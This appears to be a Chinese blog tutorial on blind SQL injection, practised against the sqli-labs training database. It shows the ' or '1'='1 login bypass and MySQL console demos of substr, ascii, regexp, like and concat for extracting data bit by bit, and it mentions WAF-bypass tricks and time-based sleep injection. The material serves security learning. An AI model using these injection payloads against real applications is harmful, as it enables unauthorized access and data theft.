sql盲注

最新推荐文章于 2024-08-18 15:09:09 发布
最新推荐文章于 2024-08-18 15:09:09 发布
阅读量364 收藏 1
点赞数 1
分类专栏: 教程 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40648358/article/details/104505164
版权

文章目录

SQL盲注

README

  • 乌市素质单男|复读机
  • 基于MYSQL5.0
  • 用于演示的数据库为sqli-labs配套的security数据库的user表
mysql> use security;
Database changed
mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| referers           |
| uagents            |
| users              |
+--------------------+
4 rows in set (0.00 sec)
mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.11 sec)

万能密码原理

  • 一般存万能密码的后台语句一般是
'... where username=\''.$_POST['username'].'\';';
'... where password=\''.$_POST['password'].'\';';
  • 我们传入的是'='的时候,语句会闭合为username=''='',或者传入1' or '1'='1,语句会闭合为username='1' or '1'='1',等号后面的内容恒为真,就达到了登陆的目的

常用函数 or 方法

substr()函数

  • 函数作用:截取字符串
  • 三个参数:substr(str,pos,len)
  • substr(目标字符串,起始位置,截取长度)
mysql> select substr('abcd',1,2);
+--------------------+
| substr('abcd',1,2) |
+--------------------+
| ab                 |
+--------------------+
1 row in set (0.00 sec)

mysql> select substr('abcd',1,1);
+--------------------+
| substr('abcd',1,1) |
+--------------------+
| a                  |
+--------------------+
1 row in set (0.00 sec)
  • 构造布尔表达式,可以用=,>,<,>=,<=等符号
mysql> select substr('abcd',1,1)='a';
+------------------------+
| substr('abcd',1,1)='a' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.00 sec)

mysql> select substr('abcd',1,1)='b';
+------------------------+
| substr('abcd',1,1)='b' |
+------------------------+
|                      0 |
+------------------------+
1 row in set (0.00 sec)

mysql> select substr('abcd',1,1)<'b';
+------------------------+
| substr('abcd',1,1)<'b' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.00 sec)
mysql> select substr('abcd',2,1)<='b';
+-------------------------+
| substr('abcd',2,1)<='b' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select substr('abcd',2,1)<'b';
+------------------------+
| substr('abcd',2,1)<'b' |
+------------------------+
|                      0 |
+------------------------+
mysql> select substr('abcdef',-1,2);
+-----------------------+
| substr('abcdef',-1,2) |
+-----------------------+
| f                     |
+-----------------------+
1 row in set (0.00 sec)
  • substr截取database()的结果
mysql> select substr(database(),1,1)='s';
+----------------------------+
| substr(database(),1,1)='s' |
+----------------------------+
|                          1 |
+----------------------------+
1 row in set (0.00 sec)

mysql> select database();
+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)
  • 应用在具体sql注入语句中,我们构造一个查询语句select * from users where username='ss' or (select substr(database(),1,1)='s');,随机输出一个username,观察回显
// or (select substr(database(),1,1)='s');
mysql> select * from users where username='ss' or (select substr(database(),1,1)='s');
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.34 sec)
  • 这个语句的逻辑是:第一个条件是username='ss' ,但是数据库中没有一个用户名为ss,第二个条件是select substr(database(),1,1)='s',因为数据库名的第一位是s,所以条件二的值为1,条件一与条件二的关系为or,0 or 1=1,所以就会输出全部结果。当条件二为select substr(database(),1,1)='a'时,就没有回显。
// or (select substr(database(),1,1)='a');
mysql> select * from users where username='' or (select substr(database(),1,1)='a');
Empty set (0.00 sec)
  • 一些其他的例子
// or (select substr(database(),1,1)='a');
mysql> select * from users where username='Dumb' or (select substr(database(),1,1)='a');
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)
// or (select substr(database(),1,1)>'a');
mysql> select * from users where username='Dumb' or (select substr(database(),1,1)>'a');
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

left()函数

  • 作用和substr的类似,不同点就是,只能从左侧第一位开始
  • left(str,len)
  • left(目标字符串,截取的长度)
  • 简单测试一下这个函数
mysql> select left('abcdef',3);
+------------------+
| left('abcdef',3) |
+------------------+
| abc              |
+------------------+
1 row in set (0.00 sec)

mysql> select left(database(),3);
+--------------------+
| left(database(),3) |
+--------------------+
| sec                |
+--------------------+
1 row in set (0.00 sec)

mid()函数

  • mid(a,b,c)
  • 从b位置开始,截取字符串a的c位
  • 和substr()函数类似
  • 简单测试一下
mysql> select mid('abcdef',1,1);
+-------------------+
| mid('abcdef',1,1) |
+-------------------+
| a                 |
+-------------------+
1 row in set (0.00 sec)

mysql> select mid('abcdef',1,2);
+-------------------+
| mid('abcdef',1,2) |
+-------------------+
| ab                |
+-------------------+
1 row in set (0.00 sec)

mysql> select mid('abcdef',2,2);
+-------------------+
| mid('abcdef',2,2) |
+-------------------+
| bc                |
+-------------------+
1 row in set (0.00 sec)
mysql> select mid('abcdef',-1,2);
+--------------------+
| mid('abcdef',-1,2) |
+--------------------+
| f                  |
+--------------------+
1 row in set (0.00 sec)

ascii()函数和ord()函数

  • 把字符转为ascii值
  • ascii(str)
  • ord(str)
  • 在盲注中比较字符和比较字符的ascii值都是可以的
  • 测试一下这两个函数
//ascii
mysql> select ascii(substr('ass',1,1));
+--------------------------+
| ascii(substr('ass',1,1)) |
+--------------------------+
|                       97 |
+--------------------------+
1 row in set (0.10 sec)

mysql> select ascii(substr('ass',1,1))=97;
+-----------------------------+
| ascii(substr('ass',1,1))=97 |
+-----------------------------+
|                           1 |
+-----------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substr('ass',1,1))=96;
+-----------------------------+
| ascii(substr('ass',1,1))=96 |
+-----------------------------+
|                           0 |
+-----------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substr('ass',1,1))>96;
+-----------------------------+
| ascii(substr('ass',1,1))>96 |
+-----------------------------+
|                           1 |
+-----------------------------+
1 row in set (0.00 sec)

//ord
mysql> select ord(substr('ass',1,1));
+------------------------+
| ord(substr('ass',1,1)) |
+------------------------+
|                     97 |
+------------------------+
1 row in set (0.00 sec)

mysql> select ord(substr('ass',1,1))=97;
+---------------------------+
| ord(substr('ass',1,1))=97 |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)

regexp正则注入

  • 一般的进行sql注入时都少不了要绕waf,所以多一种姿势,多一丝成功的几率
  • 正则注入时采用正则表达式来匹配查询的结果
  • 语法:select database() regexp ‘^s’#正则表达式
  • ^s的意思是字符串s开头,其他的正则表达式还需要系统的学习
  • 测试一下用法
mysql> select database() regexp '^s';
+------------------------+
| database() regexp '^s' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.33 sec)

mysql> select database() regexp '^se';
+-------------------------+
| database() regexp '^se' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select database() regexp '^ae';
+-------------------------+
| database() regexp '^ae' |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set (0.00 sec)

like匹配注入

  • like 是sql语句中日常使用的语法,注入原理类似于regexp,但是regexp的正则语法更灵活
  • 用法:进行模糊查询,a%的意思是以a开头的字符串,%a指以a结尾的字符串,%admin%值含admin的字符串
  • 注入中的用法测试
mysql> select database() like 's%';
+----------------------+
| database() like 's%' |
+----------------------+
|                    1 |
+----------------------+
1 row in set (0.09 sec)

mysql> select database() like 'se%';
+-----------------------+
| database() like 'se%' |
+-----------------------+
|                     1 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select database() like 'sa%';
+-----------------------+
| database() like 'sa%' |
+-----------------------+
|                     0 |
+-----------------------+
1 row in set (0.00 sec)

比大小的方法

  • 这个方法适用于无列名注入时,禁用一写可用参数时使用
  • 具体用法演示
mysql> select (select 't') > (select database());
+------------------------------------+
| (select 't') > (select database()) |
+------------------------------------+
|                                  1 |
+------------------------------------+
1 row in set (0.00 sec)

mysql> select (select 's') > (select database());
+------------------------------------+
| (select 's') > (select database()) |
+------------------------------------+
|                                  0 |
+------------------------------------+
1 row in set (0.00 sec)

mysql> select (select 'si') > (select database());
+-------------------------------------+
| (select 'si') > (select database()) |
+-------------------------------------+
|                                   1 |
+-------------------------------------+
1 row in set (0.00 sec)

mysql> select (select 'sd') > (select database());
+-------------------------------------+
| (select 'sd') > (select database()) |
+-------------------------------------+
|                                   0 |
+-------------------------------------+
1 row in set (0.00 sec)
// 74位t的16进制值
mysql> select (select 0x74) > (select database());
+-------------------------------------+
| (select 0x74) > (select database()) |
+-------------------------------------+
|                                   1 |
+-------------------------------------+
1 row in set (0.32 sec)
// 73位t的16进制值
mysql> select (select 0x73) > (select database());
+-------------------------------------+
| (select 0x73) > (select database()) |
+-------------------------------------+
|                                   0 |
+-------------------------------------+

concat()函数

  • 作用:字符串连接
  • 适用于一写关键字被禁用,可以用concat()函数绕过
  • 当select语句被过滤时,可以使用SET @t=concat(str,str,str,str) ;PREPARE a from @t ;EXECUTE a ;
  • 函数用法测试
mysql> select concat('a','b','rdd','wuhu');
+------------------------------+
| concat('a','b','rdd','wuhu') |
+------------------------------+
| abrddwuhu                    |
+------------------------------+
1 row in set (0.00 sec)

mysql> select concat(char(115),char(114),char(113));
+---------------------------------------+
| concat(char(115),char(114),char(113)) |
+---------------------------------------+
| srq                                   |
+---------------------------------------+
1 row in set (0.01 sec)

盲注利用

布尔盲注

  • 方案一:使用sqlmap配置参数直接跑,具体参考ichunqiu2020公益赛_简单的招聘系统的解法
  • 方案二:自己编写脚本,具体练习可以通过sqli-labs练习,通过优化脚本的算法可以节省时间,比如二分法等等…

时间盲注

  • 主要用到了sleep()函数或BENCHMARK函数
  • 具体参考ichunqiu2020公益赛_easysqli_copy的解法
「已注销」
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
python编写的sql盲注
10-28
python编写的sql盲注
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA实验-sql盲注
Ping_Pig的博客
09-15 1118
sql盲注:顾名思义,就是盲人注入,没有页面报错信息可以分析了,那么该怎么呢?盲注又有哪些测试的方法呢? 盲注的测试类型: boolean注入 时间注入 我们接下来就来介绍如何去测试sql注入盲注,我们还是用dvwa来举例子 Low级别 我们看到low级别同样是输入框,我们输入了正常的1,返回结果为:数据库中存在用户ID。 我们输入恶意字符,同样也返回结果为:数据库中缺少用户ID。...
SQl盲注原理及其简单演示
weixin_64066158的博客
05-02 2256
首先说下Sql盲注Sql注入的区别: 盲注:获得不了过多的信息,没有详细内容; 普通注入:可以通过较为详细的内容来分析; 盲注概述:在sql注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或者尝试,这个过程称为盲注盲注一般分为三种: 布尔盲注:页面只返回对或者错,存在或者不存在来判断 基于时间的盲注:通过页面沉睡时间来判断 报错的盲注:输入特定的语句使页面报错,网页回输出相关的错误信息;从而是我们想要的基本信息; 今天主要讲布尔盲注
SQL注入速查表
ww564的博客
11-09 386
过滤and or 十六进制绕过 or ——> o\x72 大小写绕过 Or aNd 双写绕过 oorr anandd urlencode,ascii(char),hex,unicode编码绕过 一些unicode编码举例: 单引号:' %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7 关键字内联注释尝试绕所有 /*!or*/ /*!and*/ 左括号过滤 urlencode,ascii(char),hex,unicod
SQL盲注
kexinxin1的博客
11-24 1156
SQL盲注 问题 SQL盲注,这个词我想大家应该不怎么陌生。如果说实在不知道的话,那么"SQL注入"你一定听说过。这两个词似乎有什么联系,长的跟双胞胎似的?没错,SQL盲注是一种Web系统的安全漏洞,而且是比较严重的那种,它是SQL注入的其中一种方式。也就是说,SQL注入存在很多种方式,而SQL盲注就是其中的一种。 在安全级别中,SQL盲注是一种威胁程度很高的安全漏洞,通过这种方式,可以...
sql注入及盲注漏洞
liuy_uzhi的博客
07-24 1万+
1、发现和利用sql注入漏洞的基本流程: 首先找到有数据库交互的功能页面---判断页面是否存在sql注入--利用sql注入漏洞读取数据--导出所需数据 sql 注入的基本步骤(这个跟sqlmap的步骤基本一致吧) (1)判断是什么类型注入,有没过滤了关键字,可否绕过 (2)获取数据库用户,版本,当前连接的数据库等信息 (3)获取某个数据库表的信息 (4)获取列信息 (5)最后就获取数据了 2...
BurpSuite辅助SQL盲注安装教程
03-10
BurpSuite辅助SQL盲注安装教程
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL盲注medium.pdf
05-13
SQL盲注medium.pdf 本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个...
SQL盲注详解
永远是少年
07-17 909
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL盲注详解。 一、SQL盲注详解 二、非查询SQL语句介绍 三、SQL盲注类型
SQL报错型盲注教程(原理全剖析)
Pz_mstr's Blog
08-21 1万+
深入分析基于报错的sql盲注原理,解密“公式”的奥秘
SQL注入——通过注入得到已知用户名的密码
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
MySQL之prepare用法
weixin_30741653的博客
03-17 5292
MySQL官方将prepare、execute、deallocate统称为PREPARE STATEMENT,习惯称其为【预处理语句】,下面是对其详细的介绍。 示例代码 PREPARE stmt_name FROM preparable_stmt EXECUTE stmt_name [USING @var_name [, @var_name] ...] - {...
WEB安全实战(一)SQL盲注
热门推荐
紫羽风的博客
10-30 3万+
前言 好长时间没有写过东西了,不是不想写,只不过是一直静不下心来写点东西。当然,拖了这么长的时间,也总该写点什么的。最近刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈最近接触到的安全方面的问题吧。 背景 既然提到了背景,那我们就简单的带一下,最近互联网上爆出了各种惊人的事件、各种门、各种照的,归根结底,都是网络安全出的问题,有的是网络被别人监控
MySQL中处理JSON数据:大数据分析的新方向
最新发布
Chujun123528的博客
08-18 1147
灵活性:JSON数据类型允许你在单个列中存储复杂的数据结构,如数组和嵌套对象,这减少了需要创建多个表来存储相关信息的必要性。查询能力:MySQL为JSON数据类型提供了一系列内置的函数,如, , , , , 等,使得查询和修改JSON数据变得非常便捷。索引支持:MySQL支持为JSON文档中的特定路径创建虚拟列(Generated Columns),然后可以在这些虚拟列上创建索引,从而加速基于JSON内容的查询。性能优化:随着MySQL的不断改进,对JSON数据的处理性能也在不断提高。虽然与专门的NoSQL
Java学习Day28:Mysql 第二章:斗气大陆
weixin_51721783的博客
08-16 988
设计数据库时,某一个字段属于一张表,但它同时出现另一个或多个表中,且完全等同于它在其本来所属表的意义表示尽量遵循范式理论的规约,尽可能少的冗余字段,让数据库设计看起来精致合理加入冗余字段,减少join,让数据库执行性能更好添加索引首先应考虑在 where 及 order by 涉及的列上建立索引。索引的优点大大的提高查询速度可以显著的减少查询中分组和排序的时间。索引的缺点创建索引和维护索引需要时间,而且数据量越大时间越长。
dvwa sql盲注高级
08-11
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类型的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序中存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在高级盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值